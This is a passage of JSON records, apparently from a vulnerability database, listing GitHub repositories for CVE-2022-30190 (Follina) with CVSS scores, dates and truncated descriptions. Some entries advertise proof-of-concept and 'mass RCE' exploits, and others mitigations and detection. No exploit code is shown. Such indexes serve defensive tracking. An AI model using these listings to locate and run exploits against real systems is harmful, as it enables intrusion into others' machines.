"AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-08-19T20:06:54", "description": "# Follina-CVE-2022-30190 Proof of Concept by Nee\n\n## Usage\n```ba...", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2022-06-05T13:54:04", "type": "githubexploit", "title": "Exploit for Vulnerability in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-30190"], "modified": "2022-07-18T01:41:15", "id": "F437A0D1-7913-51F2-9D43-8BC2DE62A636", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-09-12T15:34:28", "description": "# CVE-2022-30190 - Microsoft Support Diagnostic Tool\n\n## About\n\n...", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2022-06-07T10:07:52", "type": "githubexploit", "title": "Exploit for Vulnerability in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-30190"], "modified": "2022-09-12T14:58:34", "id": "F8ECE1BA-CC33-5566-B57C-1AB243A48E28", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-10-06T15:50:39", "description": "<h1 align='center'><b> Follina-attack-CVE-2022-30190-</b></h1><b...", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2022-10-06T11:41:43", "type": "githubexploit", "title": "Exploit for Vulnerability in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-30190"], "modified": "2022-10-06T15:42:31", "id": "E7177DCC-97D5-5A91-8A06-124DD3CB9739", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-09-20T16:39:31", "description": "# Follina-MSDT-Vulnerability-CVE-2022-30190-\nDetection and Remed...", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2022-07-21T06:49:44", "type": "githubexploit", "title": "Exploit for Vulnerability in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-30190"], "modified": "2022-09-20T14:40:32", "id": "E51E8D61-BAA6-5098-9EEE-50DD18427F87", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-06-09T17:09:28", "description": "# mitigate-folina\nMitigates the \"Folina\"-ZeroDay (CVE-2022-30190...", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2022-06-02T09:30:13", "type": "githubexploit", "title": "Exploit for Vulnerability in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-30190"], "modified": "2022-06-09T12:18:29", "id": "005DDBE6-0F17-58D7-9DC2-4D1F01F2A8FD", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-07-01T23:15:16", "description": "# CVE-2022-30190-Follina-Patch\nThis is a simple program allows y...", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2022-06-02T13:43:20", "type": "githubexploit", "title": "Exploit for Vulnerability in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-30190"], "modified": "2022-07-01T22:07:49", "id": "A4440EF1-5891-5FCD-BA92-DD2B6E54C7F0", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-10-02T02:23:19", "description": "# Follina - CVE-2022-30190\n\nFollina is a zero day allowing code ...", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2022-06-02T15:39:20", "type": "githubexploit", "title": "Exploit for Vulnerability in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-30190"], "modified": "2022-10-02T00:23:18", "id": "8516D742-8A1C-521C-8372-26BA9FBA2200", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-06-02T22:59:27", "description": "# CVE-2022-30190-mass-rce\nCVE-2022-30190 Zero click rce Mass Exp...", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2022-06-02T17:28:27", "type": "githubexploit", "title": "Exploit for Vulnerability in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-30190"], "modified": "2022-06-02T17:31:11", "id": "75389328-1B05-5056-B8C0-C624BF0343AD", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-10-05T12:12:49", "description": "# CVE-2022-30190-follina\nJust another PoC for the new MSDT-Explo...", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2022-06-01T11:37:08", "type": "githubexploit", "title": "Exploit for Vulnerability in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-30190"], "modified": "2022-10-05T08:34:35", "id": "B2474BAA-4133-5059-8F0B-5BAAE9664466", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-06-02T22:59:07", "description": "# CVE-2022-30190-mass\nCVE-2022-30190 Zero click rce Mass Exploit...", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2022-06-01T09:19:34", "type": "githubexploit", "title": "Exploit for Vulnerability in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-30190"], "modified": "2022-06-01T09:39:02", "id": "FAF36735-05C9-50E1-B458-BA2E15B5EB99", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-10-13T21:21:53", "description": "# cve-2022-30190\nCVE-2022-30190 remediation via removal of ms-ms...", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2022-05-31T23:32:33", "type": "githubexploit", "title": "Exploit for Vulnerability in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-30190"], "modified": "2022-10-13T20:14:47", "id": "71065DAD-91FD-5CFB-9F35-CA3E1837FF2C", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-06-07T10:58:04", "description": "# MSDT Patcher, a.k.a. CVE-2022-30190-NSIS\nThis is an NSIS scrip...", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2022-06-01T18:58:07", "type": "githubexploit", "title": "Exploit for Vulnerability in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-30190"], "modified": "2022-06-07T08:02:05", "id": "5E983FEF-4BE8-5A69-BABE-3CFFC983F1B5", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-11-04T08:33:53", "description": "# Follina Proof of Concept (CVE-2022-30190)\n\nQuick and easy \"pro...", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2022-05-31T10:47:57", "type": "githubexploit", "title": "Exploit for Vulnerability in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-30190"], "modified": "2022-11-03T22:18:04", "id": "02FCE52D-5E91-5C57-A40A-DE4FF7C726A3", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-09-27T23:28:50", "description": "# CVE-2022-30190\nCVE-2022-30190 Follina POC\n\n\nHost exploit.html...", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2022-05-31T18:58:55", "type": "githubexploit", "title": "Exploit for Vulnerability in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-30190"], "modified": "2022-09-27T23:24:23", "id": "1CC55581-1C7F-5DA8-A34C-FA125B3D510A", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-07-29T17:28:35", "description": "# CVE-2022-30190\n\n> On Monday May 30, 2022, Microsoft issued CVE...", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2022-05-31T18:00:42", "type": "githubexploit", "title": "Exploit for Vulnerability in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-30190"], "modified": "2022-07-29T16:12:57", "id": "FFA2D3A3-AFD4-580B-8424-EE4844976B65", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-10-23T20:04:43", "description": "# CVE-2022-30190\n**S...", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2022-10-23T15:24:43", "type": "githubexploit", "title": "Exploit for Vulnerability in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-30190"], "modified": "2022-10-23T15:34:15", "id": "E917FE93-F06C-5F70-915F-A5F48A30B044", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-06-26T19:58:00", "description": "# **_\ud83e\ude79CVE-2022-30190 Temporary Fix\ud83e\ude79_**\nThese are two Python scri...", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2022-06-11T11:16:56", "type": "githubexploit", "title": "Exploit for Vulnerability in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-30190"], "modified": "2022-06-15T10:21:00", "id": "39D1AD81-7117-5EA3-8421-A33979B77F49", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2023-01-31T15:00:47", "description": "# CVE-2022-30190(Follina)-PowerPoint-Version\n\nThis is CVE-2022-3...", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2022-06-29T08:48:12", "type": "githubexploit", "title": "Exploit for Vulnerability in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-30190"], "modified": "2023-01-31T12:50:35", "id": "705BFDF7-98C8-5300-AB18-E9EEE465AE5F", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2023-01-31T15:03:26", "description": "[...", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2022-06-09T09:32:10", "type": "githubexploit", "title": "Exploit for Vulnerability in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-30190"], "modified": "2023-01-31T13:05:38", "id": "D70A4D0B-027B-57A1-B882-C70D16FCA9C3", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2023-01-12T15:35:09", "description": "# CVE-2022-30190\nCVE-2022-30190 Follina POC\n\nHost exploit.html ...", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2022-05-31T06:45:25", "type": "githubexploit", "title": "Exploit for Vulnerability in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", 